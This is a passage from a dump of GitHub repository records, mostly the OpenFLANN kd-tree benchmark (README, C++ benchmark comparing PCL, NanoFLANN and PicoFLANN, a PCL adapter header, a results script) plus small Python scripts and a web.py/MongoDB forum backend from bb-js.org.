Use apenas valores separados por ponto:'))\n i= float(input('Insira o valor da corrente. Use apenas valores separados por ponto:'))\n valor = round(v / i,3)\n print ('O valor da resistencia é:', valor ,'Ω')\n"
}
] | 1 |
sarureddi/localarray
|
https://github.com/sarureddi/localarray
|
1440830d8aae7ea984cd56bd80908c668c89d5bf
|
1e20da1a94ef027025188a684b82b98ec4d63440
|
e9b9e27c1cf30c6c6bb5383a8abaa6ff4b6ee2d5
|
refs/heads/master
| 2020-06-01T09:05:46.148191 | 2019-06-07T10:25:08 | 2019-06-07T10:25:08 | 190,725,526 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.42934781312942505,
"alphanum_fraction": 0.5597826242446899,
"avg_line_length": 19.44444465637207,
"blob_id": "e4c6d11d6978334d790ef2a27f0d8f48cf8ef2d3",
"content_id": "f9c596bdf826882e3ea186957deb5d37fcf2205b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/array.py",
"repo_name": "sarureddi/localarray",
"src_encoding": "UTF-8",
"text": "n1=int(input())\nl1=[int(i) for i in input().split()]\nc1=0\nfor i in range(1,n1-1):\n\tif l1[i]<l1[i-1] and l1[i]<l1[i+1]:\n\t\tc1+=1\n\telif l1[i]>l1[i-1] and l1[i]>l1[i+1]:\n\t\tc1+=1\nprint(c1)\n"
}
] | 1 |
hiyyg/OpenFLANN
|
https://github.com/hiyyg/OpenFLANN
|
e2c454b8f9d58460cb617cd41020645be015cb3e
|
a1815ecdbd4d064f016ad2a8999004a4b7bdf728
|
2095103bb8f313555694f043fedec9a29210308e
|
refs/heads/main
| 2023-04-18T06:52:17.844161 | 2021-04-30T06:44:09 | 2021-04-30T06:44:09 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7335788607597351,
"alphanum_fraction": 0.7470840811729431,
"avg_line_length": 35.977272033691406,
"blob_id": "9c4bba6c2e49ec001af82856001d83cf4aa1a972",
"content_id": "c74308da14f649dcd1aab6470896bda83f10b36a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1629,
"license_type": "no_license",
"max_line_length": 301,
"num_lines": 44,
"path": "/README.md",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "# OpenFLANN\n\nI found PicoFLANN and compare the speed of alorithms, namely *PCL FLANN*, *NanoFLANN*, and *PicoFLANN*.\n\n## Characteristics\n\n* Set NanoFLANN and PicoFLANN to be avaiable on Point Cloud Libarary (PCL).\n* It's simple to use them! Just git pull this repository, then copy & paste the header files in `include` folder.\n* Usage is totally same with Point Cloud Library, i.e., `setInputCloud`, `nearestSearch`, or `radiusSearch`. \n* Many robotics guys refer to [NanoFLANN in LOAM](https://github.com/laboshinl/loam_velodyne/blob/master/include/loam_velodyne/nanoflann_pcl.h); however, the function `radiusSearch` in LOAM is actually not in use so the function does not work properly. So, I debugged it and revise the `radiusSearch`.\n## Reference \n* [PCL FLANN](https://pointclouds.org/documentation/tutorials/kdtree_search.html)\n* [NanoFLANN](https://github.com/jlblancoc/nanoflann)\n* [PicoFLANN](https://github.com/rmsalinas/picoflann) (The original developer says it is faster than NanoFLANN, and it actually is when the scale of points becomes larger)\n\n\n## Simulation results\n\nExperiments: Please refer to `src/main.cpp`. I reran the experiment 1,000 times to measure mean speed of each case.\n\nOne-line summary: For robotics application, NanoFLANN is better than other FLANN implementations.\n\nYou can show the results via python code (tabulate is necessary)\n```\ncd outputs\npython viz_output.py\n```\n\n### K-Nearest Neighbor\n\n\n\n\n\n\n\n\n### Radius Search\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.48324888944625854,
"alphanum_fraction": 0.5053113102912903,
"avg_line_length": 38.7337646484375,
"blob_id": "addc7074cbe1d82dbba9a2ee99a720eda6b0261e",
"content_id": "2cda9c55f7fcf15bac939baa091cc65d91e381e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6119,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 154,
"path": "/src/main.cpp",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "#include <pcl/point_cloud.h>\n#include <pcl/kdtree/kdtree_flann.h>\n#include <fstream>\n#include <iostream>\n#include <vector>\n#include <ctime>\n#include \"nanoflann_pcl.h\"\n#include \"picoflann_pcl.h\"\n\n#define RANDOM_SCALE 100.0\n\nusing namespace std;\n\nstruct TimeSet{\n float _t_pcl;\n float _t_nano;\n float _t_pico;\n TimeSet(float t_pcl, float t_nano, float t_pico): _t_pcl(t_pcl), _t_nano(t_nano), _t_pico(t_pico){}\n};\nTimeSet print_time(const clock_t& c0, const clock_t& c1, const clock_t& c2, const clock_t& c3){\n float t_pcl = float(c1 - c0) / CLOCKS_PER_SEC;\n float t_nano = float(c2 - c1) / CLOCKS_PER_SEC;\n float t_pico = float(c3 - c2) / CLOCKS_PER_SEC;\n\n// cout<<t_pcl<<\" | \"<<t_nano<<\" | \"<<t_pico<<endl;\n return TimeSet(t_pcl, t_nano, t_pico);\n}\ntemplate <typename T>\nvoid print_vectors(vector<T>& v0, vector<T>& v1, vector<T>& v2){\n assert(v0.size() == v1.size());\n assert(v1.size() == v2.size());\n assert(v2.size() == v0.size());\n for (int i=0; i< v0.size(); ++i){\n cout<<v0[i]<<\" | \"<<v1[i]<< \" | \"<<v2[i]<<endl;\n }\n}\n\nint main (int argc, char** argv)\n{\n srand (time (NULL));\n pcl::KdTreeFLANN<pcl::PointXYZ> PCLFLANN_kdtree;\n nanoflann::KdTreeFLANN<pcl::PointXYZ> NanoFLANN_kdtree;\n picoflann_pcl::KdTreeFLANN<pcl::PointXYZ> PicoFLANN_kdtree;\n\n vector<int> num_random_pts = {10000, 30000, 60000, 100000, 200000};\n vector<int> K_pts = {1, 10, 100, 500, 1000, 5000};\n vector<double> radiuses = {5.0, 10.0, 20.0, 40.0, 80.0};\n\n // --------- Set target param -----------\n string target = \"knn\"; // radius or knn\n // --------------------------------------\n int num_params;\n if (target == \"radius\"){\n num_params = radiuses.size();\n }\n else if (target == \"knn\"){\n num_params = K_pts.size();\n }\n\n string absDir = \"/home/shapelim/CLionProjects/OpenFLANN/outputs\";\n double searchRadius; // for radiusSearch\n int K; // for KNN\n for (const int& NUM_RANDOM_SAMPLE_POINTS: num_random_pts) {\n for (int ii = 0; ii < num_params; ++ii) {\n string targetName;\n if (target == \"radius\"){\n searchRadius = radiuses[ii];\n targetName = to_string(int(round(searchRadius * 10) / 10));\n }\n else if (target == \"knn\"){\n K = K_pts[ii];\n targetName = to_string(K);\n }\n\n string txtname = targetName + \"_\" + to_string(NUM_RANDOM_SAMPLE_POINTS) + \".txt\";\n string pclFilename = absDir + \"/pcl_\" + txtname;\n string nanoFilename = absDir + \"/nano_\" + txtname;\n string picoFilename = absDir + \"/pico_\" + txtname;\n std::ofstream pclO(pclFilename, ios::app);\n std::ofstream nanoO(nanoFilename, ios::app);\n std::ofstream picoO(picoFilename, ios::app);\n\n for (int dummyIdx = 0; dummyIdx < 1000; ++dummyIdx) {\n\n pcl::PointCloud<pcl::PointXYZ>::Ptr cloud(new pcl::PointCloud<pcl::PointXYZ>);\n\n // Generate pointcloud data\n cloud->width = NUM_RANDOM_SAMPLE_POINTS;\n cloud->height = 1;\n cloud->points.resize(cloud->width * cloud->height);\n\n for (std::size_t i = 0; i < cloud->size(); ++i) {\n (*cloud)[i].x = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n (*cloud)[i].y = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n (*cloud)[i].z = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n }\n\n // check time\n clock_t c_i0 = clock();\n PCLFLANN_kdtree.setInputCloud(cloud);\n clock_t c_i1 = clock();\n NanoFLANN_kdtree.setInputCloud(cloud);\n clock_t c_i2 = clock();\n PicoFLANN_kdtree.setInputCloud(cloud);\n clock_t c_i3 = clock();\n\n TimeSet init_ts = print_time(c_i0, c_i1, c_i2, c_i3);\n\n pcl::PointXYZ searchPoint;\n\n searchPoint.x = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n searchPoint.y = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n searchPoint.z = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n\n // K nearest neighbor search or Radius\n\n std::vector<int> idxPcl(K), idxNano(K), idxPico(K);\n std::vector<float> distPcl(K), distNano(K), distPico(K);\n clock_t c_k0, c_k1, c_k2, c_k3;\n if (target == \"knn\"){\n c_k0 = clock();\n PCLFLANN_kdtree.nearestKSearch(searchPoint, K, idxPcl, distPcl);\n c_k1 = clock();\n NanoFLANN_kdtree.nearestKSearch(searchPoint, K, idxNano, distNano);\n c_k2 = clock();\n PicoFLANN_kdtree.nearestKSearch(searchPoint, K, idxPico, distPico);\n c_k3 = clock();\n }else if (target == \"radius\"){\n std::cout<<\"Searching radius...\"<<std::endl;\n c_k0 = clock();\n PCLFLANN_kdtree.radiusSearch(searchPoint, searchRadius, idxPcl, distPcl);\n c_k1 = clock();\n NanoFLANN_kdtree.radiusSearch(searchPoint, searchRadius, idxNano, distNano);\n c_k2 = clock();\n PicoFLANN_kdtree.radiusSearch(searchPoint, searchRadius, idxPico, distPico);\n c_k3 = clock();\n// To check the size!\n// cout<<idxPcl.size()<<\" , \"<<idxNano.size()<< \" , \"<<idxPico.size()<<endl;\n// cout<<distPcl.size()<<\" , \"<<distNano.size()<< \" , \"<<distPico.size()<<endl;\n }\n\n TimeSet K_ts = print_time(c_k0, c_k1, c_k2, c_k3);\n\n pclO << init_ts._t_pcl << \" \" << K_ts._t_pcl<< endl;\n nanoO << init_ts._t_nano << \" \" << K_ts._t_nano<< endl;\n picoO << init_ts._t_pico << \" \" << K_ts._t_pico<< endl;\n }\n pclO.close();\n nanoO.close();\n picoO.close();\n }\n }\n return 0;\n}\n"
},
{
"alpha_fraction": 0.46659305691719055,
"alphanum_fraction": 0.5063501000404358,
"avg_line_length": 38.369564056396484,
"blob_id": "cae8b1be8d93540bd1541245c8181a54cf2c1e8a",
"content_id": "84abe83c33d3b9c8ec36ab08ba4a664b69de2e73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1811,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 46,
"path": "/outputs/viz_output.py",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom tabulate import tabulate\nnum_pts = 10000\n\ndef parse_data(alg_name, target_np):\n means = np.mean(target_np, axis=0)\n time_set = round(means[0], 5)\n time_iter = round(means[1] * 1000, 5)\n time_total = round(np.mean(np.sum(target_np, axis=1)), 5)\n\n return [alg_name, time_set, time_iter, time_total]\n\nif __name__ == \"__main__\":\n TARGET = \"knn\" #\"knn\" or radius\n k_pts = [1, 10, 100, 500, 1000, 5000]\n radiuses = [5, 10, 20, 40, 80]\n if TARGET == \"knn\":\n target_param = k_pts\n table_header = [\"K points\", \"Alg.\", \"Init. [s]\", \"Search [ms]\", \"Total [s]\"]\n elif TARGET == \"radius\":\n target_param = radiuses\n table_header = [\"radius [m]\", \"Alg.\", \"Init. [s]\", \"Search [ms]\", \"Total [s]\"]\n for num_pts in [10000, 30000, 60000, 100000, 200000]:\n print(\"Num. points: \" + str(num_pts))\n table_line = []\n for i in target_param:\n pcl = np.loadtxt(TARGET + \"/pcl_\" + str(i) + \"_\" + str(num_pts)+\".txt\", delimiter=\" \")\n nano = np.loadtxt(TARGET + \"/nano_\" + str(i) + \"_\" + str(num_pts)+\".txt\", delimiter=\" \")\n pico = np.loadtxt(TARGET + \"/pico_\" + str(i) + \"_\" + str(num_pts)+\".txt\", delimiter=\" \")\n table_viz = []\n table_viz.append(parse_data(\"PCL\", pcl))\n table_viz.append(parse_data(\"Nano\", nano))\n table_viz.append(parse_data(\"Pico\", pico))\n per_line = [i]\n for j in range(4):\n cell = \"\"\n for k in range(3):\n cell += str(table_viz[k][j])\n if k != 2:\n cell += \"\\n\"\n\n per_line.append(cell)\n\n table_line.append(per_line)\n\n print(tabulate(table_line, headers=table_header, tablefmt=\"fancy_grid\"))\n"
},
{
"alpha_fraction": 0.5836057662963867,
"alphanum_fraction": 0.5875759124755859,
"avg_line_length": 36.23478317260742,
"blob_id": "1da6eb0914677c0c894c7c82c9442fef60d2670d",
"content_id": "4d8fcb1fb5a64527681560ff2f9682e2f560bd30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4282,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 115,
"path": "/include/picoflann_pcl.h",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "//\n// Created by Hyungtae Lim on 21. 4. 14..\n//\n\n#ifndef KDTREE_FLANN_PICOFLANN_PCL_H\n#define KDTREE_FLANN_PICOFLANN_PCL_H\n\n#include \"picoflann.h\"\n\nnamespace picoflann_pcl\n{\n\n// Adapter class to give to nanoflann the same \"look and fell\" of pcl::KdTreeFLANN.\n// limited to squared distance between 3D points\n template <typename PointT>\n class KdTreeFLANN\n {\n public:\n\n typedef boost::shared_ptr<KdTreeFLANN<PointT> > Ptr;\n typedef boost::shared_ptr<const KdTreeFLANN<PointT> > ConstPtr;\n\n typedef typename pcl::PointCloud<PointT> PointCloud;\n typedef typename pcl::PointCloud<PointT>::Ptr PointCloudPtr;\n typedef typename pcl::PointCloud<PointT>::ConstPtr PointCloudConstPtr;\n\n typedef boost::shared_ptr<std::vector<int> > IndicesPtr;\n typedef boost::shared_ptr<const std::vector<int> > IndicesConstPtr;\n\n KdTreeFLANN();\n\n\n inline Ptr makeShared () { return Ptr (new KdTreeFLANN<PointT> (*this)); }\n\n void setInputCloud(KdTreeFLANN::PointCloudPtr cloud);\n\n int nearestKSearch (const PointT& point, int k, std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances);\n\n int radiusSearch (const PointT &point, double radius, std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances) const;\n\n private:\n struct Point_Adaptor{\n inline float operator( )(const PointT &elem, int dim)const{\n if (dim ==0) return elem.x;\n else if (dim == 1) return elem.y;\n else if (dim == 2) return elem.z;\n else throw std::invalid_argument(\"Invalid dimension is coming\");\n }\n };\n\n struct PointCloud_Container{\n size_t _size;\n PointCloudPtr _array;\n PointCloud_Container(){}\n PointCloud_Container(PointCloudPtr& array, size_t Size) {\n _array = array;\n _size = Size;\n }\n inline size_t size()const{return _size;}\n inline const PointT &at(int idx)const{ return _array->points[idx];}\n };\n PointCloud_Container _container;\n picoflann::KdTreeIndex<3, Point_Adaptor> _kdtree; // 3 indicates the dimension: x, y, z\n };\n\n//---------- Definitions ---------------------\n template<typename PointT> inline\n KdTreeFLANN<PointT>::KdTreeFLANN(){}\n\n template<typename PointT> inline\n void KdTreeFLANN<PointT>::setInputCloud(KdTreeFLANN::PointCloudPtr cloud)\n {\n size_t num_pts = cloud->points.size();\n _kdtree.build(KdTreeFLANN::PointCloud_Container(cloud, num_pts));\n _container = KdTreeFLANN::PointCloud_Container(cloud, num_pts);\n }\n\n template<typename PointT> inline\n int KdTreeFLANN<PointT>::nearestKSearch(const PointT& point, int num_closest,\n std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances)\n {\n std::vector<std::pair<uint32_t,double> > resultSet = _kdtree.searchKnn(_container, point, num_closest);\n const size_t nFound = resultSet.size();\n // Set results in PCL format\n k_indices.resize(nFound);\n k_sqr_distances.resize(nFound);\n for(int i=0; i<nFound; i++ ){\n k_indices[i] = static_cast<int>(resultSet[i].first);\n k_sqr_distances[i] = static_cast<float>(resultSet[i].second);\n }\n return nFound;\n }\n\n template<typename PointT> inline\n int KdTreeFLANN<PointT>::radiusSearch(const PointT &point, double radius,\n std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances) const\n {\n std::vector<std::pair<uint32_t, double> > resultSet = _kdtree.radiusSearch(_container, point, radius);\n const size_t nFound = resultSet.size();\n\n k_indices.resize(nFound);\n k_sqr_distances.resize(nFound);\n for(int i=0; i<nFound; i++ ){\n k_indices[i] = static_cast<int>(resultSet[i].first);\n k_sqr_distances[i] = static_cast<float>(resultSet[i].second);\n }\n return nFound;\n }\n}\n\n#endif //KDTREE_FLANN_PICOFLANN_PCL_H\n"
},
{
"alpha_fraction": 0.772857129573822,
"alphanum_fraction": 0.7828571200370789,
"avg_line_length": 25.923076629638672,
"blob_id": "583d0771f41198c63b5efbe4886fc47ef2003728",
"content_id": "b95614f5465990d9e3271e7b39433d6a8a8006fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 700,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 26,
"path": "/CMakeLists.txt",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.17)\nproject(OpenFLANN)\n\nset(CMAKE_CXX_STANDARD 17)\n\nfind_package(PCL 1.7 REQUIRED)\nfind_package(Boost REQUIRED COMPONENTS system filesystem)\n\n\ninclude_directories(${PCL_INCLUDE_DIRS})\nlink_directories(${PCL_LIBRARY_DIRS})\nadd_definitions(${PCL_DEFINITIONS})\n\ninclude_directories(\n ${catkin_INCLUDE_DIRS}\n include\n)\n\nadd_executable(kdtree_benchmark src/main.cpp)\ntarget_link_libraries(kdtree_benchmark ${PCL_LIBRARIES})\n\nadd_executable(kdtree_nanoflann src/nanoflann_example.cpp)\ntarget_link_libraries(kdtree_nanoflann ${PCL_LIBRARIES})\n\nadd_executable(kdtree_picoflann src/picoflann_example.cpp)\ntarget_link_libraries(kdtree_picoflann ${PCL_LIBRARIES})\n"
},
{
"alpha_fraction": 0.5883303284645081,
"alphanum_fraction": 0.6193895936012268,
"avg_line_length": 35.894039154052734,
"blob_id": "a6f7c4c7f2ca40ff716a8a76f3341b56ec832e96",
"content_id": "8bbf3faee40736b72d9fb06b28b3993830e32b13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5570,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 151,
"path": "/src/picoflann_example.cpp",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "//\n// Created by shapelim on 21. 4. 14..\n//\n\n#include <random>\n#include <vector>\n#include <fstream>\n#include \"picoflann.h\"\n#include <pcl/point_cloud.h>\n#include <pcl/point_types.h>\n#include <iostream>\n#include <exception>\nvoid example1(){\n //Data type\n struct Point2f{\n Point2f(float X,float Y) { x=X;y=Y; }\n float x,y;\n };\n\n // Adapter.\n // Given an Point2f element, it returns the element of the dimension specified such that dim=0 is x and dim=1 is y\n struct PicoFlann_Point2fAdapter{\n inline float operator( )(const Point2f &elem, int dim)const { return dim==0?elem.x:elem.y; }\n };\n\n //create the points randomly\n std::default_random_engine generator;\n std::uniform_real_distribution<double> distribution(-1000.0,1000.0);\n std::vector<Point2f> data;\n for(size_t i=0;i<1000;i++)\n data.push_back( Point2f ( distribution(generator),distribution(generator)));\n ///------------------------------------------------------------\n /// Create the kdtree\n picoflann::KdTreeIndex<2,PicoFlann_Point2fAdapter> kdtree;//2 is the number of dimensions\n kdtree.build(data);\n //search 10 nearest neibors to point (0,0)\n std::vector<std::pair<uint32_t,double> > res=kdtree.searchKnn(data,Point2f(0,0),10);\n\n //radius search in a radius of 30 (the resulting distances are squared)\n res=kdtree.radiusSearch(data,Point2f(0,0),30);\n //another version\n kdtree.radiusSearch(res,data,Point2f(0,0),30);\n\n //you can save to a file\n std::ofstream file_out(\"out.bin\",std::ios::binary);\n kdtree.toStream(file_out);\n\n //recover from the file\n picoflann::KdTreeIndex<2,PicoFlann_Point2fAdapter> kdtree2;\n std::ifstream file_in(\"out.bin\",std::ios::binary);\n kdtree2.fromStream(file_in);\n res=kdtree2.radiusSearch(data,Point2f(0,0),30);\n\n}\n\n\n//Using an array of 3d points\nvoid example2(){\n\n struct Point3f{\n Point3f(float X,float Y,float Z) { data[0]=X;data[1]=Y;data[2]=Z; }\n float data[3];\n };\n struct PicoFlann_Array3f_Adapter{\n inline float operator( )(const Point3f &elem, int dim)const{ return elem.data[dim]; }\n };\n struct PicoFlann_Array3f_Container{\n const Point3f *_array;\n size_t _size;\n PicoFlann_Array3f_Container(float *array,size_t Size):_array((Point3f*)array),_size(Size){}\n inline size_t size()const{return _size;}\n inline const Point3f &at(int idx)const{ return _array [idx];}\n };\n std::default_random_engine generator;\n std::uniform_real_distribution<double> distribution(-1000.0,1000.0);\n\n int nPoints=1000;\n float *array=new float[nPoints*3];\n for(size_t i=0;i<1000*3;i++)\n array[i]= distribution(generator);\n\n ///------------------------------------------------------------\n picoflann::KdTreeIndex<3, PicoFlann_Array3f_Adapter> kdtree;// 3 is the number of dimensions, L2 is the type of distance\n kdtree.build( PicoFlann_Array3f_Container(array, nPoints));\n PicoFlann_Array3f_Container p3container(array,nPoints);\n std::vector<std::pair<uint32_t,double> > res=kdtree.searchKnn(p3container,Point3f(0,0,0),10);\n res=kdtree.radiusSearch(p3container,Point3f(0,0,0),30);\n std::cout<<\"Done!\"<<std::endl;\n}\n\n//Using an array of 3d points\nvoid example3(){\n\n struct Point3f{\n Point3f(float X,float Y,float Z) { data[0]=X;data[1]=Y;data[2]=Z; }\n float data[3];\n };\n\n struct PicoFlann_PCL_Point_Adapter{\n inline float operator( )(const pcl::PointXYZ &elem, int dim)const{\n if (dim ==0) return elem.x;\n else if (dim == 1) return elem.y;\n else if (dim == 2) return elem.z;\n else throw std::invalid_argument(\"Invalid dimension is comming\");\n }\n };\n struct PicoFlann_PCL_Cloud_Container{\n size_t _size;\n pcl::PointCloud<pcl::PointXYZ>::Ptr _array;\n\n PicoFlann_PCL_Cloud_Container(pcl::PointCloud<pcl::PointXYZ>::Ptr& array, size_t Size) {\n _array = array;\n _size = Size;\n }\n inline size_t size()const{return _size;}\n inline const pcl::PointXYZ &at(int idx)const{ return _array->points[idx];}\n };\n int NUM_RANDOM_SAMPLE_POINTS = 1000;\n\n double RANDOM_SCALE = 100.0;\n pcl::PointCloud<pcl::PointXYZ>::Ptr cloud(new pcl::PointCloud<pcl::PointXYZ>);\n\n // Generate pointcloud data\n cloud->width = NUM_RANDOM_SAMPLE_POINTS;\n cloud->height = 1;\n cloud->points.resize (cloud->width * cloud->height);\n\n for (std::size_t i = 0; i < cloud->size (); ++i)\n {\n (*cloud)[i].x = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n (*cloud)[i].y = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n (*cloud)[i].z = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n }\n ///------------------------------------------------------------\n pcl::PointXYZ searchPoint;\n\n searchPoint.x = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n searchPoint.y = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n searchPoint.z = RANDOM_SCALE * rand () / (RAND_MAX + 1.0f);\n\n picoflann::KdTreeIndex<3, PicoFlann_PCL_Point_Adapter> kdtree;// 3 is the number of dimensions, L2 is the type of distance\n kdtree.build( PicoFlann_PCL_Cloud_Container(cloud, NUM_RANDOM_SAMPLE_POINTS));\n PicoFlann_PCL_Cloud_Container p3container(cloud, NUM_RANDOM_SAMPLE_POINTS);\n std::vector<std::pair<uint32_t,double> > res=kdtree.searchKnn(p3container,searchPoint,10);\n res=kdtree.radiusSearch(p3container,searchPoint,30);\n std::cout<<\"Done!\"<<std::endl;\n}\nint main(){\n example3();\n return 0;\n}"
}
] | 6 |
sbm20202020/odoo_modules
|
https://github.com/sbm20202020/odoo_modules
|
52317a5ae37f7b02ae22d790e593dc7d0e1d1955
|
9a26b81427b40854b68fad73897e942f838d3d7e
|
12e6d8d7d8b13b5886c806401afd5472992fb3d5
|
refs/heads/main
| 2023-01-02T22:38:44.932007 | 2020-10-30T15:30:25 | 2020-10-30T15:30:25 | 308,667,324 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5708661675453186,
"alphanum_fraction": 0.5721784830093384,
"avg_line_length": 35.28571319580078,
"blob_id": "4f501f53b59b6bc4c4b3b3b349b6530c96dd7852",
"content_id": "33fb52b9970e7869f13e4068b7639096b4e64038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 762,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 21,
"path": "/test_starly/controllers/controllers.py",
"repo_name": "sbm20202020/odoo_modules",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# from odoo import http\n\n\n# class TestStarly(http.Controller):\n# @http.route('/test_starly/test_starly/', auth='public')\n# def index(self, **kw):\n# return \"Hello, world\"\n\n# @http.route('/test_starly/test_starly/objects/', auth='public')\n# def list(self, **kw):\n# return http.request.render('test_starly.listing', {\n# 'root': '/test_starly/test_starly',\n# 'objects': http.request.env['test_starly.test_starly'].search([]),\n# })\n\n# @http.route('/test_starly/test_starly/objects/<model(\"test_starly.test_starly\"):obj>/', auth='public')\n# def object(self, obj, **kw):\n# return http.request.render('test_starly.object', {\n# 'object': obj\n# })\n"
}
] | 1 |
bb-js/bb-js.org
|
https://github.com/bb-js/bb-js.org
|
300a44cd76f6f665ef53ef9186699a1a847473d2
|
fe83d97864e4eace5546b6dd03e8ef0109afdcc7
|
0849202e8150e3db4f724475e7e9bbac0fc1f3f9
|
refs/heads/master
| 2020-12-30T21:59:18.355936 | 2015-02-28T13:19:55 | 2015-02-28T13:19:55 | 18,942,993 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5236592888832092,
"alphanum_fraction": 0.5248422622680664,
"avg_line_length": 28.488372802734375,
"blob_id": "da2d9d773fb46b0cfdf9317112ffb3cdf6c4718e",
"content_id": "097ad51dc706312353df0789caddcdee8693b328",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2570,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 86,
"path": "/src/handlers/topic.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nimport json\nimport sqlite3\nfrom datetime import datetime\n\nimport web\n\nfrom models import User, Topic, Message\nfrom .base import bad_request, display_time, pass_time\n\nsession = web.config._session\n\nCACHE_USER = {}\n\n\nclass TopicHandler:\n def GET(self, pk=None):\n if pk:\n topic = Topic.get_by_id(pk)\n topic['created_time'] = display_time(topic['created_time'])\n return json.dumps(topic)\n\n topics = Topic.get_all()\n result = []\n for t in topics:\n topic = dict(t)\n if 'tags' not in topic:\n topic['tags'] = ''\n\n try:\n user = CACHE_USER[t.owner_id]\n except KeyError:\n user = User.get_by_id(t.owner_id)\n CACHE_USER[t.owner_id] = user\n topic['owner_name'] = user.username\n topic['created_time'] = display_time(topic['created_time'])\n\n message = Message.get_latest_by_topic(str(t.id))\n message_count = Message.topic_count(str(t.id))\n if message:\n # 最新回复\n try:\n user = CACHE_USER[message.user_id]\n except KeyError:\n user = User.get_by_id(message.user_id)\n CACHE_USER[message.user_id] = user\n message.user_name = user.username\n message.created_time = pass_time(message.created_time)\n topic['new_comment'] = message\n topic['message_count'] = message_count\n result.append(topic)\n return json.dumps(result)\n\n def POST(self):\n if not session.user or session.user.id is None:\n return bad_request('请先登录!')\n\n data = web.data()\n data = json.loads(data)\n\n tags = [tag for tag in data.get('tags', '').split(' ') if tag]\n topic_data = {\n \"title\": data.get('title'),\n \"tags\": tags,\n \"owner_id\": session.user.id,\n \"created_time\": datetime.now(),\n }\n\n try:\n topic_id = Topic.create(**topic_data)\n except sqlite3.IntegrityError:\n return bad_request('你已创建过该名称!')\n\n topic_data.update({\n \"id\": topic_id,\n \"owner_name\": session.user.username,\n \"created_time\": display_time(topic_data.get('created_time')),\n })\n return json.dumps(topic_data)\n\n def PUT(self, obj_id=None):\n data = web.data()\n print data\n\n def DELETE(self, obj_id=None):\n pass\n"
},
{
"alpha_fraction": 0.5333720445632935,
"alphanum_fraction": 0.5368543267250061,
"avg_line_length": 22.283782958984375,
"blob_id": "02879128bdcd24ffb17ed6f8674e6ef2ec431b31",
"content_id": "9e1b47051204336643ef6bb8754dd910113adf9d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3450,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 148,
"path": "/src/models.py",
"repo_name": "bb-js/bb-js.org",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nfrom web import Storage\nfrom pymongo import MongoClient\nimport markdown\n\n\n# docker instance name: mongodb\nclient = MongoClient('mongodb', 27017)\ndb = client.bb_js_db\n\n\ndef get_next_id(name):\n name = 'counter_%s' % name\n ret = None\n try:\n ret = db.counters.find_and_modify(\n query={'_id': name},\n update={'$inc': {'seq': 1}},\n upsert=True\n )\n except TypeError:\n db.counters.insert(\n {\n \"_id\": name,\n \"seq\": 0\n }\n )\n if ret:\n return ret.get('seq')\n return 0\n\n\nclass class_property(object):\n def __init__(self, func):\n self.func = func\n\n def __get__(self, instance, klass):\n return self.func(klass)\n\n\nclass DBManage(object):\n @class_property\n def table(cls):\n return cls.__name__.lower()\n\n @classmethod\n def get_by_id(cls, id):\n id = int(id)\n obj = db[cls.table].find_one({'_id': id})\n return Storage(**obj)\n\n @classmethod\n def get_all(cls):\n return [Storage(**obj) for obj in db[cls.table].find().sort(\"_id\", -1)]\n\n @classmethod\n def create(cls, **model_dict):\n _id = get_next_id(cls.table)\n model_dict.update({\n '_id': _id,\n 'id': _id,\n })\n return 